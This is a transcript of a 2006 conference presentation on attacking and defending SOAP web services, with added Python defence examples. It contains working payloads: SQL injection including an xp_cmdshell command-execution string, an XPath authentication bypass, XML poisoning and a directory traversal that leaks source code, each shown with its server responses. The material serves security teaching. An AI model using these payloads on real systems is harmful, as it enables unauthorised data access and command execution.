Advanced Web Services Hacking (AusCERT 06)

Advanced Web Services Hacking - Attacks & Defense (AusCERT 2006).

Web services attacks are on the rise with the evolution of web applications that consume back end web services over SOAP. UDDI, SOAP and WSDL are the three important building blocks of these new attack vectors. Several attacks are evolving around web services, such as UDDI enumeration, XPATH injection, XML poisoning, WSDL scanning and SOAP brute forcing. At the same time a new range of defenses is evolving for web services, based on SOAP filtering. It is critical to know the methodologies, attack vectors and defense strategies before deploying web services into the corporate environment. This paper discusses advanced web services hacking methods and defense approaches.

    Presentation Transcript

    • Advanced Web Services Hacking – Attacks & Defense. Shreeraj Shah
    • Introduction (Brief)
      – Founder & Director, Net Square
      – Past experience: Chase, IBM & Foundstone
      – Interest: Web security research
      – Published: Advisories, Tools, Papers etc.
      – Book: Web Hacking
      – http://shreeraj.blogspot.com, shreeraj@net-square.com
    • Agenda
      – Industry
      – Technologies
      – Web Services Security
      – Strategies & Methods
      – Tools & Exploits
      – Attack Vectors
      – Defense Controls
      – Corporate Web Services (TCP – 80/443)
    • Industry
      – Web 2.0 Applications are on the rise
        – Rich Internet Applications (RIA) are reshaping the application front
      – Web Services are on the rise – forming the backend of applications
      – Gartner is advising companies to take up Web services now, or risk losing out to competitors embracing the technology.
    • Industry
      – By 2008, those without Web Services or Service-Oriented Architecture (SOA) would find their competitors had left them in the dust. [Gartner]
      – 2006-07 would see the top 2000 global companies pick up the technology and make it mainstream. Government and SMB would finally follow in 2008.
      – Web services would rocket from $1.6 billion in 2004 to $34 billion by 2007. [IDC]
    • Technologies
      – Web Services are forming the back end and are accessible over SOAP
      – AJAX – empowering browsers
      – XML based services
      – Rich Internet Applications are consuming back end web services
      – Search engines and mechanisms for publishing and accessing web services
      – Security evolving around web services
    • Technologies (architecture diagram): Internet → DMZ → Trusted zone → Internal/Corporate. A Web Client, or an integrated client framework (with SOAP or ActiveX), reaches the Web Server and the Web Services Server and Engine in the DMZ (static pages: HTML, HTM etc.; dynamic pages: ASP, DHTML, PHP, CGI etc.; scripted Web Services), which call the Application Server (ASP.NET with .Net, J2EE App Server, Web Services etc.) and the DB behind it.
    • Technologies (diagram): a Web Client makes simple GET/POST calls to HTTP resources on the Web Server and simple AJAX calls to Web Services resources; a Web Services Client talks to the Web Services directly.
    • Web services stack
      – Presentation Stack: XML
      – Security Stack: WS-Security
      – Discovery Stack: UDDI, DISCO
      – Access Stack: WSDL, SOAP
      – Transport Stack: HTTP, HTTPS
    • Security!
      – Web service – evolving as a new attack point in the application framework.
      – Toolkits and exploits are coming up
      – Too many protocols and confusion
      – Race for deployment – poor implementation
      – Cases and attacks are growing with the growth in business usage
    • Assessment strategies (diagram): Web Services Risk Model → Blackbox Assessment and Whitebox Assessment → Web Services Defense Controls
    • Risk – In transit
      – Sniffing or Spoofing
      – WS-Routing security concern
      – Replay attacks
    • Risk – Web services Engine
      – Buffer overflow
      – XML parsing attacks
      – Spoiling Schema
      – Complex or Recursive structure as payload
      – Denial of service
      – Large payload
    • Risk – Web services Deployment
      – Fault code leaks
      – Permissions & Access issues
      – Poor policies
      – Customized error leakage
      – Authentication and Certification
    • Risk – Web services User code
      – Parameter tampering
      – WSDL probing
      – SQL/LDAP/XPATH/OS command injection
      – Virus/Spyware/Malware injection
      – Bruteforce
      – Data type mismatch
      – Content spoofing
      – Session tampering
      – Format string
      – Information leakage
      – Authorization
    • wschess (Tool) – Download: http://net-square.com/wschess/
      – Tools: wsPawn, wsFootprint, wsSearch, wsDiscovery, wsEnum, wsKnight, wsAudit, wsProxy, wsMod, wsRook
      – Covers: Footprinting, Discovery (public domain search), Enumeration, Manual Audit, Auto Audit, Defense
    • Agenda – Tools & Exploits: Footprinting, Discovery, Public Domain
    • Web Services Footprinting
    • Footprinting
      – Objectives
        – Place for web services…
        – We may know the company name in this case?
        – Do we have any whois for web services?
        – If we answer the above questions, we have enough information on what to assess.
    • UDDI
      – Universal Description, Discovery, and Integration (UDDI)
      – It acts as White/Yellow/Green pages
      – Xmethods etc…
      – Information can be published to it and retrieved from it
      – Gets replicated across networks over the internet
    • UDDI – It includes
      – businessEntity
      – businessService
      – bindingTemplate
      – tModel
    • Footprinting – Business Name (UDDI find_business request)

          POST /inquire HTTP/1.1
          Content-Type: text/xml; charset=utf-8
          SOAPAction: ""
          Cache-Control: no-cache
          Pragma: no-cache
          User-Agent: Java/1.4.2_04
          Host: uddi.microsoft.com
          Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
          Connection: keep-alive
          Content-Length: 229

          <?xml version="1.0" encoding="UTF-8" ?>
          <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
            <Body>
              <find_business generic="2.0" maxRows="100" xmlns="urn:uddi-org:api_v2"><name>amazon</name></find_business>
            </Body>
          </Envelope>

          HTTP/1.1 100 Continue

    • Footprinting – Business Name (UDDI find_business response)

          HTTP/1.1 200 OK
          Date: Tue, 28 Sep 2004 09:53:53 GMT
          Server: Microsoft-IIS/6.0
          X-Powered-By: ASP.NET
          X-AspNet-Version: 1.1.4322
          Cache-Control: private, max-age=0
          Content-Type: text/xml; charset=utf-8
          Content-Length: 1339

          <?xml version="1.0" encoding="utf-8"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <businessList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2">
                <businessInfos>
                  <businessInfo businessKey="bfb9dc23-adec-4f73-bd5f-5545abaeaa1b">
                    <name xml:lang="en-us">Amazon Web Services for Testing</name>
                    <description xml:lang="ko">Amazon Web Services 2.0 - We now offer software developers the opportunity to integrate Amazon.com</description>
                    <serviceInfos>
                      <serviceInfo serviceKey="41213238-1b33-40f4-8756-c89cc3125ecc" businessKey="bfb9dc23-adec-4f73-bd5f-5545abaeaa1b">
                        <name xml:lang="en-us">Amazon Web Services 2.0</name>
                      </serviceInfo>
                    </serviceInfos>
                  </businessInfo>
                  <businessInfo businessKey="18b7fde2-d15c-437c-8877-ebec8216d0f5">
                    <name xml:lang="en">Amazon.com</name>
                    <description xml:lang="en">E-commerce website and platform for finding, discovering, and buying products online.</description>
                    <serviceInfos>
                      <serviceInfo serviceKey="ba6d9d56-ea3f-4263-a95a-eeb17e5910db" businessKey="18b7fde2-d15c-437c-8877-ebec8216d0f5">
                        <name xml:lang="en">Amazon.com Web Services</name>
                      </serviceInfo>
                    </serviceInfos>
                  </businessInfo>
                </businessInfos>
              </businessList>
            </soap:Body>
          </soap:Envelope>

    • Footprinting – Services (UDDI find_service request)

          POST /inquire HTTP/1.1
          Content-Type: text/xml; charset=utf-8
          SOAPAction: ""
          Cache-Control: no-cache
          Pragma: no-cache
          User-Agent: Java/1.4.2_04
          Host: uddi.microsoft.com
          Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
          Connection: keep-alive
          Content-Length: 213

          <?xml version="1.0" encoding="UTF-8" ?>
          <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
            <Body>
              <find_service generic="2.0" xmlns="urn:uddi-org:api_v2"><name>amazon</name></find_service>
            </Body>
          </Envelope>

          HTTP/1.1 100 Continue

    • Footprinting – Services (UDDI find_service response)

          HTTP/1.1 200 OK
          Date: Tue, 28 Sep 2004 10:07:42 GMT
          Server: Microsoft-IIS/6.0
          X-Powered-By: ASP.NET
          X-AspNet-Version: 1.1.4322
          Cache-Control: private, max-age=0
          Content-Type: text/xml; charset=utf-8
          Content-Length: 1272

          <?xml version="1.0" encoding="utf-8"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <serviceList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2">
                <serviceInfos>
                  <serviceInfo serviceKey="6ec464e0-2f8d-4daf-b4dd-5dd4ba9dc8f3" businessKey="914374fb-f10f-4634-b8ef-c9e34e8a0ee5">
                    <name xml:lang="en-us">Amazon Research Pane</name>
                  </serviceInfo>
                  <serviceInfo serviceKey="41213238-1b33-40f4-8756-c89cc3125ecc" businessKey="bfb9dc23-adec-4f73-bd5f-5545abaeaa1b">
                    <name xml:lang="en-us">Amazon Web Services 2.0</name>
                  </serviceInfo>
                  <serviceInfo serviceKey="ba6d9d56-ea3f-4263-a95a-eeb17e5910db" businessKey="18b7fde2-d15c-437c-8877-ebec8216d0f5">
                    <name xml:lang="en">Amazon.com Web Services</name>
                  </serviceInfo>
                  <serviceInfo serviceKey="bc82a008-5e4e-4c0c-8dba-c5e4e268fe12" businessKey="18785586-295e-448a-b759-ebb44a049f21">
                    <name xml:lang="en">AmazonBookPrice</name>
                  </serviceInfo>
                  <serviceInfo serviceKey="8faa80ea-42dd-4c0d-8070-999ce0455930" businessKey="ee41518b-bf99-4a66-9e9e-c33c4c43db5a">
                    <name xml:lang="en">AmazonBookPrice</name>
                  </serviceInfo>
                </serviceInfos>
              </serviceList>
            </soap:Body>
          </soap:Envelope>

    • Footprinting – tModels (UDDI find_tModel request)

          POST /inquire HTTP/1.1
          Content-Type: text/xml; charset=utf-8
          SOAPAction: ""
          Cache-Control: no-cache
          Pragma: no-cache
          User-Agent: Java/1.4.2_04
          Host: uddi.microsoft.com
          Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
          Connection: keep-alive
          Content-Length: 211

          <?xml version="1.0" encoding="UTF-8" ?>
          <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
            <Body>
              <find_tModel generic="2.0" xmlns="urn:uddi-org:api_v2"><name>amazon</name></find_tModel>
            </Body>
          </Envelope>

          HTTP/1.1 100 Continue

    • Footprinting – tModels (UDDI find_tModel response)

          HTTP/1.1 200 OK
          Date: Tue, 28 Sep 2004 10:12:42 GMT
          Server: Microsoft-IIS/6.0
          X-Powered-By: ASP.NET
          X-AspNet-Version: 1.1.4322
          Cache-Control: private, max-age=0
          Content-Type: text/xml; charset=utf-8
          Content-Length: 516

          <?xml version="1.0" encoding="utf-8"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <tModelList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2">
                <tModelInfos>
                  <tModelInfo tModelKey="uuid:c5da9443-d058-4ede-9db1-4f1d5deb805c">
                    <name>Amazon Web Services 2.0 WSDL File</name>
                  </tModelInfo>
                </tModelInfos>
              </tModelList>
            </soap:Body>
          </soap:Envelope>

      – DEMO
    • Web Services Discovery
    • Web Service Discovery
      – After footprinting web services, the next step is to perform discovery.
      – On the basis of the services found one can do so.
      – Finding the access point for web services will point to its discovery.
      – Discovery is the key to the kingdom.
      – Once again over UDDI.
    • Web Service Discovery
      – From the various keys – Service and Business – one can dig out the access point from UBN.
      – This is part of the protocol and is identified from the XML block itself.
      – DEMO
    • Web Service Search
      – Search in the public domain
      – Use search engines – Google & MSN – an excellent tool
      – Look for wsdl, asmx, jws etc.
      – Filetype and allinurl are best friends
      – Leveraging Web APIs
      – DEMO
    • Web Services Enumeration & Profiling
    • Technology Identification
      – Running on which platform?
      – Configuration and Structures
      – File extensions
      – Path discovery
      – This is very useful information
    • Demo Application (diagram): Web Services, Location of WSDL
    • Technology Identification
      – The location can be obtained from UDDI as well, if already published.
      – WSDL location [Access Point]: http://192.168.11.2/ws/dvds4less.asmx?wsdl
      – .asmx – indicates a .Net server from MS
    • Technology Identification
      – Similarly .jws – for Java web services
      – /ws/ in the path indicates web services
      – MS-SOAPToolkit can be identified as well

          C:\>nc 192.168.11.2 80
          HEAD / HTTP/1.0

          HTTP/1.1 200 OK
          Server: Microsoft-IIS/5.0
          Date: Tue, 28 Sep 2004 18:48:20 GMT
          X-Powered-By: ASP.NET
          Connection: Keep-Alive
          Content-Length: 7565
          Content-Type: text/html
          Set-Cookie: ASPSESSIONIDSSSRQDRC=LMMPKHNAAOFDHMIHAODOJHCO; path=/
          Cache-control: private

    • Technology Identification
      – The resource header spits out some information as well

          C:\>nc 192.168.11.2 80
          HEAD /ws/dvds4less.asmx HTTP/1.0

          HTTP/1.1 500 Internal Server Error
          Server: Microsoft-IIS/5.0
          Date: Tue, 28 Sep 2004 18:50:09 GMT
          X-Powered-By: ASP.NET
          X-AspNet-Version: 1.1.4322
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Content-Length: 3026

    • WSDL Scanning/Enumeration
      – What is WSDL?
      – What information can one enumerate from WSDL?
      – Is WSDL exposure a threat or not?
    • WSDL
      – WSDL is the Web Services Definition Language
      – It is similar to the old IDL for remote calls used in CORBA or other remote invoke methods.
      – It contains the details of methods
      – Types of I/O
      – Parameters of methods
      – It is an XML document with standards.
    • Nodes of WSDL (diagram): Types (data types), Message, Operations, Binding, Service (access)
    • WSDL <Service> – where the call is going to hit; it is where the service is listening.

          <service name="dvds4less">
            <port name="dvds4lessSoap" binding="s0:dvds4lessSoap">
              <soap:address location="http://192.168.11.2/ws/dvds4less.asmx"/>
            </port>
          </service>

    • WSDL <portType> – methods one can call

          <portType name="dvds4lessSoap">
            <operation name="Intro">
              <input message="s0:IntroSoapIn"/>
              <output message="s0:IntroSoapOut"/>
            </operation>
            <operation name="getProductInfo">
              <input message="s0:getProductInfoSoapIn"/>
              <output message="s0:getProductInfoSoapOut"/>
            </operation>
            <operation name="getRebatesInfo">
              <input message="s0:getRebatesInfoSoapIn"/>
              <output message="s0:getRebatesInfoSoapOut"/>
            </operation>
          </portType>

    • WSDL <Message> – each operation's input and output messages

          <portType name="dvds4lessSoap">
            <operation name="getProductInfo">
              <input message="s0:getProductInfoSoapIn"/>
              <output message="s0:getProductInfoSoapOut"/>
            </operation>
          </portType>
          <message name="getProductInfoSoapIn">
            <part name="parameters" element="s0:getProductInfo"/>
          </message>
          <message name="getProductInfoSoapOut">
            <part name="parameters" element="s0:getProductInfoResponse"/>
          </message>

    • WSDL <Types> – the schema elements the messages refer to

          <message name="getProductInfoSoapIn">
            <part name="parameters" element="s0:getProductInfo"/>
          </message>
          <message name="getProductInfoSoapOut">
            <part name="parameters" element="s0:getProductInfoResponse"/>
          </message>
          <s:element name="getProductInfo">
            <s:complexType>
              <s:sequence>
                <s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/>
              </s:sequence>
            </s:complexType>
          </s:element>
          <s:element name="getProductInfoResponse">
            <s:complexType>
              <s:sequence>
                <s:element minOccurs="0" maxOccurs="1" name="getProductInfoResult" type="s:string"/>

    • WSDL Profile after Scan

          Methods          INPUT    OUTPUT
          Intro            -No-     String
          getProductInfo   String   String
          getRebatesInfo   String   String

      – DEMO
    • How it looks? (diagram): the WSDL (<Service>, <PortType>, <Message>, <Types>) describes the remote Web Services class with the methods Intro, getProductInfo and getRebatesInfo, which client code invokes.
    • Web Services Attack Vectors
    • AV 1 – XML poisoning
      – XML node manipulation
      – Attack on parsing logic
        – SAX
        – DOM
      – Can be lethal – DoS or breaking execution logic
    • XML poisoning – the original record

          <CustomerRecord>
            <CustomerNumber>289001</CustomerNumber>
            <FirstName>John</FirstName>
            <LastName>Smith</LastName>
            <Address>Apt 31, 1st Street</Address>
            <Email>john@smith.com</Email>
            <PhoneNumber>3809922347</PhoneNumber>
          </CustomerRecord>

    • XML poisoning – duplicated nodes injected

          <CustomerRecord>
            <CustomerNumber>289001</CustomerNumber>
            <FirstName>John</FirstName><CustomerNumber>289001</CustomerNumber>
            <FirstName>John</FirstName>
            <LastName>Smith</LastName>
            <Address>Apt 31, 1st Street</Address>
            <Email>john@smith.com</Email>
            <PhoneNumber>3809922347</PhoneNumber>
          </CustomerRecord>

    • XML poisoning – a node repeated 100 times and closing tags dropped

          <CustomerRecord>
            <CustomerNumber>289001</CustomerNumber>
            <FirstName>John</FirstName>
            <FirstName>John</FirstName>
            ... 100 times ...
            <FirstName>John</FirstName>
            <LastName>Smith</LastName>
            <Address>Apt 31, 1st Street<Address>
            <Email>john@smith.com<Email>
            <PhoneNumber>3809922347<PhoneNumber>
          </CustomerRecord>
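    An added example (not code from the presentation) of the input validation that stops the three poisoned records above before they reach parsing logic: a strict parser refuses the unclosed tags, a size cap bounds the repeated-node payload, and a cardinality check catches the duplicated nodes. The three sample records are constructed from the slides; the size limit is an assumption.

```python
"""Reject poisoned <CustomerRecord> documents before they reach business logic.

Added example, not code from the presentation. It applies the defence the XML
poisoning slides imply: parse with a strict parser (unclosed or mismatched
tags are refused outright), cap the document size, and enforce the expected
cardinality of every child element so duplicated nodes never reach the SAX or
DOM handling code. The three samples are constructed from the slides.
"""
import xml.etree.ElementTree as ET

# Children of <CustomerRecord> and how many times each may appear.
CUSTOMER_RECORD_SCHEMA = {"CustomerNumber": 1, "FirstName": 1, "LastName": 1,
                          "Address": 1, "Email": 1, "PhoneNumber": 1}
MAX_DOCUMENT_BYTES = 4096   # assumption: a legitimate record is far smaller


def validate_customer_record(xml_text):
    """Return (ok, reason); ok is True only for a well-formed, schema-shaped record."""
    if len(xml_text.encode("utf-8")) > MAX_DOCUMENT_BYTES:
        return False, "document exceeds %d bytes" % MAX_DOCUMENT_BYTES
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return False, "malformed XML: %s" % exc
    if root.tag != "CustomerRecord":
        return False, "unexpected root element %r" % root.tag
    counts = {}
    for child in root:
        if child.tag not in CUSTOMER_RECORD_SCHEMA:
            return False, "unexpected element %r" % child.tag
        if len(child):      # leaf fields must not carry nested elements
            return False, "element %r must not contain child nodes" % child.tag
        counts[child.tag] = counts.get(child.tag, 0) + 1
    for tag, allowed in CUSTOMER_RECORD_SCHEMA.items():
        if counts.get(tag, 0) != allowed:
            return False, "element %r appears %d times, expected %d" % (
                tag, counts.get(tag, 0), allowed)
    return True, "ok"


# Slide 1: the legitimate record.
GOOD_RECORD = """<CustomerRecord>
<CustomerNumber>289001</CustomerNumber><FirstName>John</FirstName>
<LastName>Smith</LastName><Address>Apt 31, 1st Street</Address>
<Email>john@smith.com</Email><PhoneNumber>3809922347</PhoneNumber>
</CustomerRecord>"""

# Slide 2: a second CustomerNumber/FirstName pair injected; still well-formed XML.
DUPLICATED_NODES = GOOD_RECORD.replace(
    "<FirstName>John</FirstName>",
    "<FirstName>John</FirstName><CustomerNumber>289001</CustomerNumber>"
    "<FirstName>John</FirstName>", 1)

# Slide 3: FirstName repeated 100 times and the trailing fields left unclosed.
REPEATED_AND_UNCLOSED = ("<CustomerRecord><CustomerNumber>289001</CustomerNumber>"
                         + "<FirstName>John</FirstName>" * 100
                         + "<LastName>Smith</LastName><Address>Apt 31, 1st Street<Address>"
                         "<Email>john@smith.com<Email><PhoneNumber>3809922347<PhoneNumber>"
                         "</CustomerRecord>")

if __name__ == "__main__":
    for label, doc in [("good", GOOD_RECORD), ("duplicated", DUPLICATED_NODES),
                       ("repeated/unclosed", REPEATED_AND_UNCLOSED)]:
        print("%-18s -> %s" % (label, validate_customer_record(doc)))
```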
    • AV 2 – Parameter tampering & Fault code leakage
      – The fault codes of web services spit out a lot of information about internal workings.
      – This attack can fetch internal paths, database interfaces etc.
      – The fault code is part of the SOAP envelope, and this helps an attacker make logical deductions about assets.
      – DEMO
    • SOAP request – Forcing a Fault Code (source of enumeration); method call getRebatesInfo, input to the method in <fileinfo>

          <?xml version="1.0" encoding="utf-16"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <getRebatesInfo xmlns="http://tempuri.org/">
                <fileinfo>abx.xyz</fileinfo>
              </getRebatesInfo>
            </soap:Body>
          </soap:Envelope>

    • SOAP response – Fault Code: path enumeration

          <?xml version="1.0" encoding="utf-16"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <soap:Fault>
                <faultcode>soap:Server</faultcode>
                <faultstring>Server was unable to process request. --&gt; Could not find file &amp;quot;c:\inetpub\wwwroot\rebates\abx.xyz&amp;quot;.</faultstring>
                <detail />
              </soap:Fault>
            </soap:Body>
          </soap:Envelope>

    • AV 3 – SQL injection
      – SQL injection can be done using SOAP traffic.
      – It is an innovative way of identifying database interface points.
      – One can leverage xp_cmdshell via SOAP.
      – The back end database can be compromised using this attack.
      – DEMO
    • SOAP request – method call getProductInfo, input to the method in <id>

          <?xml version="1.0" encoding="utf-16"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <getProductInfo xmlns="http://tempuri.org/">
                <id>1</id>
              </getProductInfo>
            </soap:Body>
          </soap:Envelope>

    • SOAP response – Product Information

          <?xml version="1.0" encoding="utf-16"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <getProductInfoResponse xmlns="http://tempuri.org/">
                <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
              </getProductInfoResponse>
            </soap:Body>
          </soap:Envelope>

    • SOAP response – Fault Code: indicates SQL Server, a place for SQL injection

          <?xml version="1.0" encoding="utf-16"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <soap:Fault>
                <faultcode>soap:Server</faultcode>
                <faultstring>Server was unable to process request. --&gt; Cannot use empty object or column names. Use a single space if necessary.</faultstring>
                <detail />
              </soap:Fault>
            </soap:Body>

    • SOAP request – Popular SQL Injection

          <?xml version="1.0" encoding="utf-16"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <getProductInfo xmlns="http://tempuri.org/">
                <id>1 or 1=1</id>
              </getProductInfo>
            </soap:Body>
          </soap:Envelope>

    • SOAP response – Works!! The entire table is out

          <?xml version="1.0" encoding="utf-16"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <getProductInfoResponse xmlns="http://tempuri.org/">
                <getProductInfoResult>/(1)Finding Nemo($14.99)/ /(2)Bend it like Beckham($12.99)/ /(3)Doctor Zhivago($10.99)/ /(4)A Bug's Life($13.99)/ /(5)Lagaan($12.99)/ /(6)Monsoon Wedding($10.99)/ /(7)Lawrence of Arabia($14.99)/</getProductInfoResult>
              </getProductInfoResponse>
            </soap:Body>

    • SOAP request – Exploiting this vulnerability (exploit code in the <id> parameter)

          <?xml version="1.0" encoding="utf-16"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <getProductInfo xmlns="http://tempuri.org/">
                <id>1;EXEC master..xp_cmdshell 'dir c: > c:\inetpub\wwwroot\ws\dir.txt'</id>
              </getProductInfo>
            </soap:Body>
          </soap:Envelope>

    • SOAP response – Works!! Looks like a normal response

          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <getProductInfoResponse xmlns="http://tempuri.org/">
                <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
              </getProductInfoResponse>
            </soap:Body>
          </soap:Envelope>

    • But … the code got executed: the response looks normal, yet admin was obtained via cmdshell.
    • AV 4 – XPATH injection
      – XPATH is a new way of querying XML documents.
      – This attack works nicely on web services since they use XML extensively.
      – A developer's loophole can be leveraged with an exploit.
      – XPATH query crafting is a next generation attack method.
    • XPATH Injection – Basics
      – XPATH is a language defined to find information in an XML document.
      – As the XPATH name suggests, it indeed uses a path to traverse through the nodes of an XML document and look for specific information in the document.
      – XPATH provides expressions like slash (/), double slash (//), dot (.), double dot (..), @, =, <, > etc. They help in traversing through the XML document.
    • XPATH – Vulnerable Code

          string fulltext = "";
          string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass";
          SqlXmlCommand co = new SqlXmlCommand(coString);
          co.RootTag = "Credential";
          co.CommandType = SqlXmlCommandType.Sql;
          co.CommandText = "SELECT * FROM users for xml Auto";
          XmlReader xr = co.ExecuteXmlReader();
          xr.MoveToContent();
          fulltext = xr.ReadOuterXml();
          XmlDocument doc = new XmlDocument();
          doc.LoadXml(fulltext);
          // user and pass arrive from the SOAP request and are concatenated straight into the XPath
          string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
          XmlNodeList xmln = doc.SelectNodes(credential);
          string temp;
          if (xmln.Count > 0)
          {
              // True: credential matched
          }
          else
          {
              // False
          }

    • Attacking the XPATH point
      – //users[@username='"+user+"' and @password='"+pass+"']"
      – XPATH parsing can be leveraged by passing the following string: ' or 1=1 or ''='
      – This will always be true on the first node, and the user can get access as whoever is the first user.
      – //users[@username='' or 1=1 or ''='' and @password='any']
      – Bingo! DEMO
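    An added example (not the presentation's code) of the fix for the vulnerable snippet above: the credential check walks the <users> nodes and compares attributes in code, so request text never reaches an XPath parser and the ' or 1=1 or ''=' string has nothing to rewrite. vulnerable_xpath() only reproduces the query string the slide's concatenation builds. USERS_XML is a constructed stand-in for the document the C# code loads from "SELECT * FROM users for xml Auto".

```python
"""Credential check over the users XML without building an XPath from input.

Added example, not the presentation's code. The vulnerable slide concatenates
user and pass into //users[@username='...' and @password='...'], so the
string ' or 1=1 or ''=' rewrites the predicate and the first node matches.
The hardened authenticate() never hands request text to an XPath engine: it
walks the <users> nodes and compares attributes in code, in constant time.
USERS_XML is a constructed stand-in for the document the C# snippet builds
from SELECT * FROM users ... for xml Auto.
"""
import hmac
import xml.etree.ElementTree as ET

USERS_XML = """<Credential>
  <users username="admin" password="adm1n-s3cret"/>
  <users username="john" password="john-pass"/>
</Credential>"""

INJECTION_STRING = "' or 1=1 or ''='"      # the payload quoted on the slide


def vulnerable_xpath(user, pwd):
    """The query string the slide's code builds; returned here, never evaluated."""
    return "//users[@username='" + user + "' and @password='" + pwd + "']"


def _same(a, b):
    """Constant-time string comparison (bytes form, so non-ASCII input is accepted)."""
    return hmac.compare_digest(a.encode("utf-8"), b.encode("utf-8"))


def authenticate(doc, user, pwd):
    """Return the matched username or None. Request text never reaches XPath."""
    for node in doc.iterfind("users"):      # fixed path, no user-controlled text
        # Both attributes are compared in code. The slide's data model keeps
        # passwords in clear; hashing them is a separate fix.
        if _same(node.get("username", ""), user) and _same(node.get("password", ""), pwd):
            return node.get("username")
    return None


USERS_DOC = ET.fromstring(USERS_XML)

if __name__ == "__main__":
    print("vulnerable query:", vulnerable_xpath(INJECTION_STRING, "any"))
    print("hardened lookup :", authenticate(USERS_DOC, INJECTION_STRING, "any"))
    print("valid login     :", authenticate(USERS_DOC, "john", "john-pass"))
```

    Where an XPath query is genuinely needed, the same principle applies: bind the values as XPath variables through the library's parameter mechanism rather than concatenating them into the expression.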
    • AV 6 – LDAP injection
      – LDAP authentication in place
      – Possible to manipulate LDAP queries
      – May lead to enumeration OR manipulation
      – Interesting attack vector
      – Fault code leaks the LDAP interface
      – DEMO
    • AV 7 – File System access
      – Identifying file system points
      – Directory traversal & access
      – Leads to file access and source code exposure
      – Lethal if found!
      – DEMO
    • SOAP request / SOAP response – the getRebatesInfo fault-code request (input abx.xyz) and the fault leaking the path c:\inetpub\wwwroot\rebates\abx.xyz shown under AV 2 are repeated here as the starting point for file system access.
    • SOAP request – Forcing a file; method call getRebatesInfo, input to the method in <fileinfo>

          <?xml version="1.0" encoding="utf-16"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <getRebatesInfo xmlns="http://tempuri.org/">
                <fileinfo>../rebates.asp</fileinfo>
              </getRebatesInfo>
            </soap:Body>
          </soap:Envelope>

    • SOAP response – File access to the system (parameter tampering)

          <?xml version="1.0" encoding="utf-16"?>
          <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <soap:Body>
              <getRebatesInfoResponse xmlns="http://tempuri.org/">
                <getRebatesInfoResult>&lt;%
          ' file: rebates.asp
          ' date: 20-AUG-03
          ' desc: rebates listing
          ' author: nd
          ' client: dvds4less
          'check if we have been called with a filename or without
          loc = request.querystring("loc")
          lenloc = len(loc)
          if lenloc &gt; 0 then
          ' we have been called with a filename
          ' so print the rebate coupon
          %&gt;&lt;img …………………….
                </getRebatesInfoResult>
